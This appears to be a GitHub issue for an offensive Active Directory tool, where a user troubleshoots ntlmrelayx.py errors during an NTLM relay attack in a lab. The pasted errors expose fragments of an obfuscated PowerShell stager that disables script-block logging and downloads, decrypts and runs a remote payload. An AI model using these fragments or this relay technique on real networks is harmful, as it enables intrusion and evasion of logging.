DanMcInerney / icebreaker

Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment
MIT License

Ntlmrelayx.py shows 'SMB SessionError' and throws unhandled exception #18

Closed ss6851 closed 6 years ago

ss6851 commented 6 years ago

I am trying to use NTLM relaying to get domain admin in my virtual environment. However, ntlmrelayx.py first shows 'SMB SessionError' and then throws an unhandled exception.

[*] Authenticating against smb://192.168.106.131 as SAFEDOMAIN\Administrator SUCCEED
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
[-] SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access 
flags are incompatible.)
[*] Executed specified command on host: 192.168.106.131
Method invocation failed because 
[System.Collections.Generic.Dictionary`2[[System.String, mscorlib, 
Version=4.0.0.0, Culture=neutral, 
PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, 
Culture=neutral, PublicKeyToken=b77a5c561934e089]]] does not contain a method 
named 'nEW'.
At line:1 char:374
+ ... ionLogging']=0}$Val=[CollectIOnS.GEneRIc.DICTioNary[sTRINg,SySTeM.OBjEct]
]::nEW( ...
+                    
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodNotFound

You cannot call a method on a null-valued expression.
At line:1 char:441
+ ... BjEct]]::nEW();$val.ADd('EnableScriptB'+'lockLogging',0);$vAL.ADd('Enable
ScriptB ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:1 char:483
+ ... ockLogging',0);$vAL.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKE
Y_LOCAL ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull

 Exception calling "DownloadData" with "1" argument(s): "Unable to connect to 
 the remote server"
 At line:1 char:1657
 + ... uVhm0oeKRKg=");$daTa=$WC.DoWNLoADDAta($SeR+$t);$IV=$daTa[0..3];$Data=$DAt
a[4..$D ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : WebException

Cannot index into a null array.
At line:1 char:1689
+ ... 
DDAta($SeR+$t);$IV=$daTa[0..3];$Data=$DAta[4..$DATA.LeNgTH];-jOin[ChAR[]](& $R 
$ ...
+                    ~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : NullArray

Cannot index into a null array.
At line:1 char:1705
+ ... IV=$daTa[0..3];$Data=$DAta[4..$DATA.LeNgTH];-jOin[ChAR[]](& $R $DAta 
($IV+$K))|I ...
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo          : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : NullArray

~ : The term '~' is not recognized as the name of a cmdlet, function, script 
file, or operable program. Check the spelling of the name, or if a path was 
included, verify that the path is correct and try again.
At line:1 char:1
+ ~
+ ~
+ CategoryInfo          : ObjectNotFound: (~:String) [], CommandNotFoundEx 
 ception
+ FullyQualifiedErrorId : CommandNotFoundException

ss6851 commented 6 years ago

Sometimes, for the same setup, ntlmrelay shows the following error:

[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an 
object but has not been granted those access rights.)